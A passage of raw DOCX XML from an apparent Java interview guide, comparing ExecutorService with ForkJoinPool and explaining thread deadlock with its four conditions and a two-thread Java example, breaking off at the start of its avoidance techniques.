      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="689D85CC" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D864E16"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Efficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="646E77EF"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Suitable for independent tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFBF2C6"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Optimized for recursive, parallel tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="53F87837" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E22C44A"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D13B47"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Performs well for independent tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73DBD7F3" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E218C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>More efficient for recursive task splitting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E28C864" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="130FFD1A">
          <v:rect id="_x0000_i1832" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9CB28A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A4F0A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you have independent tasks that don’t require recursion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12373D07" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you are working with divide-and-conquer tasks that can be recursively split into smaller tasks and processed in parallel. It’s more efficient for parallel recursive algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2780E212" w14:textId="0148353D" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="32C66CC9">
          <v:rect id="_x0000_i1833" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A663B" w14:textId="6AFEA3FC" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="003732DA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="_Toc196307753"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Deadlock and how do you avoid it in Java Multithreading</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w14:paraId="267650A3" w14:textId="40A757D3" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="004E218C" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00A6755D" w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eadlock</w:t>
      </w:r>
      <w:r w:rsidR="00A6755D" w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a situation in multithreading where two or more threads are blocked forever because they are each waiting for the other to release a resource that they need to proceed. This can lead to an application freezing or becoming unresponsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2400315E"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A deadlock occurs in a scenario where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672A6CF" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread 1</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> locks </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource A</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and waits for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource B</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67762DDC" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread 2</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> locks </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource B</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and waits for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resource A</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA48E2"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Since both threads are waiting for each other to release the resources, neither of them can proceed, resulting in a deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5AD885" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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Conditions for Deadlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A315F06"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For a deadlock to occur, the following four conditions must hold simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03175AED" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mutual Exclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> At least one resource must be held in a non-shareable mode. Only one thread can access a resource at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207DF3C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hold and Wait:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A thread must be holding at least one resource and waiting for additional resources that are being held by other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730BCFEC" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No Preemption:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resources cannot be preempted. Once a thread holds a resource, it cannot be taken away by another thread until it releases it voluntarily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27347A63" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Circular Wait:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A set of threads must be waiting for each other in a circular chain. For example, thread 1 waits for thread 2 to release a resource, thread 2 waits for thread 3, and so on, until the last thread waits for thread 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2347DFF0" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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Example of Deadlock in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766C7F7"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Here’s an example where two threads are trying to acquire two resources, leading to a deadlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D121709"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class ResourceA {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A98FA"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synchronized void methodA(ResourceB b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B6718"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Thread.currentThread().getName() + " locked ResourceA, trying to lock ResourceB");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEC702"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b.last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B54F8C"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54B99410" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E71FA5C"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synchronized void last() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E7F61"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Thread.currentThread().getName() + " inside ResourceA last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C896BB4"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4EF5AC76"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E5FD10" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2A329E"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class ResourceB {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4AF25"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synchronized void methodB(ResourceA a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FC674"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Thread.currentThread().getName() + " locked ResourceB, trying to lock ResourceA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D29D5"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a.last();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A9F95"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2498CA62" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1498CE5F"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synchronized void last() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531D1E7"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Thread.currentThread().getName() + " inside ResourceB last");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E5805"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0F938E23"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC091C8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A580EB"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public class DeadlockExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F9A5A"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E14683"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final ResourceA resourceA = new ResourceA();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055AE4F0"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final ResourceB resourceB = new ResourceB();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D7A65" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1D38CE"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Thread 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F18EE95"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hread t1 = new Thread(() -&gt; resourceA.methodA(resourceB));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85A95D"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Thread 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF2975"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hread t2 = new Thread(() -&gt; resourceB.methodB(resourceA));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A62AB9" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C1BE0C"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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A486BC"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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1B2DC"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65C79695"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8CB4A" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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How to Avoid Deadlock in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CBA4B5"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There are several techniques that can be used to avoid deadlock in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A90E3" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0E5071C2">
          <v:rect id="_x0000_i1834" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65154C33" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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1. Lock Ordering:</w:t>
      </w:r>
